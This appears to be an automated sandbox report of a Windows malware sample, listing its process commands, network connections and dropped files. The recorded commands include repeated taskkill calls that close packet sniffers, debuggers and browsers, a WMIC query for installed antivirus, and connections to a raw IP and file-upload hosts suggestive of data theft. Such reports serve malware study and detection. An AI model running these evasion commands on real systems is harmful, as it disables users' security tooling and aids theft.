C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc6e3fab58,0x7ffc6e3fab68,0x7ffc6e3fab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3088 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4412 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4520 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4940 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| NL | 91.92.241.69:5555 | | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn1.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn3.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn3.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn3.gstatic.com | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | tcp |
| NL | 91.92.241.69:6060 | 91.92.241.69 | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | store8.gofile.io | udp |
| US | 206.168.191.31:443 | store8.gofile.io | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freeimage.host | udp |
| US | 104.21.22.122:443 | freeimage.host | tcp |
| US | 8.8.8.8:53 | 31.191.168.206.in-addr.arpa | udp |
| NL | 91.92.241.69:6060 | 91.92.241.69 | tcp |
| US | 8.8.8.8:53 | 122.22.21.104.in-addr.arpa | udp |
| N/A | 127.0.0.1:62901 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | netlimiter.com | udp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 20.40.202.13:443 | netlimiter.com | tcp |
| US | 8.8.8.8:53 | 13.202.40.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.netlimiter.com | udp |
| SK | 37.9.175.165:443 | download.netlimiter.com | tcp |
| SK | 37.9.175.165:443 | download.netlimiter.com | tcp |
| US | 8.8.8.8:53 | 165.175.9.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | virustotal.com | udp |
| US | 216.239.32.21:443 | virustotal.com | tcp |
| US | 216.239.32.21:443 | virustotal.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| GB | 142.250.180.3:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | 21.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.34.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 142.250.200.35:443 | recaptcha.net | tcp |
| GB | 142.250.200.35:443 | recaptcha.net | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
Files
C:\Users\Admin\AppData\Roaming\Prism.exe
C:\Users\Admin\AppData\Local\dllhost.exe
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl86t.dll
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3m1yxif2.a5u.ps1
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\init.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\encoding\cp1252.enc
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk86t.dll
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\_tkinter.pyd
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl8\8.5\msgcat-1.6.1.tm
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\tm.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\tk.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\auto.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\tclIndex
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\vcruntime140.dll
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\python310.dll
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\vistaTheme.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\encoding\symbol.enc
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\xpTheme.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\winTheme.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\clamTheme.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\altTheme.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\classicTheme.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\defaults.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\sizegrip.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\treeview.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\spinbox.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\combobox.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\entry.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\panedwindow.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\notebook.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\progress.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\scale.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\scrollbar.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\menubutton.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\button.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\utils.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\cursors.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\fonts.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\ttk\ttk.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\text.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\spinbox.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\scrlbar.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\scale.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\panedwindow.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\menu.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\listbox.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\entry.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\button.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\icons.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\opt0.4\pkgIndex.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\http1.0\pkgIndex.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tk\pkgIndex.tcl
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\tcl\package.tcl
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\Downloads\netlimiter-5.3.14.0.exe
C:\Users\Admin\AppData\Local\Temp\{63BC5994-B37B-4416-A29E-B2D208BD5CAE}\8BD5CAE\netlimiter-5.3.14.0.x64.msi
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\frame_bottom_mid.bmp
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\frame_bottom_left.bmp
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\frame_left_inactive.bmp
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\frame_left.bmp
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\frame_caption.bmp
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\frame_top_mid.bmp
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\frame_top_left.bmp
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\sys_min_hot.png
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\sys_close_normal.png
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\sys_close_hot.png
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\applogoicon.bmp
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\backbutton
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\backgroundprepare
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\nextcancelbuttons
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\PreparePrereqDlgProgress.gif
C:\Users\Admin\AppData\Local\Temp\MSI9D06.tmp
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\metroinstallbutton
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\checkbox
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\browsebutton
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\ProgressImage.png
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\metrobuttonimage
C:\Users\Admin\AppData\Local\Temp\MSIB3B3.tmp
C:\Users\Admin\AppData\Local\Temp\shiB4D1.tmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Temp\shiE670.tmp
C:\Windows\Installer\MSIF34B.tmp
C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe.config
C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe
C:\Windows\Installer\{63BC5994-B37B-4416-A29E-B2D208BD5CAE}\nl_icon.exe
C:\Windows\Installer\MSIA54.tmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000028
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index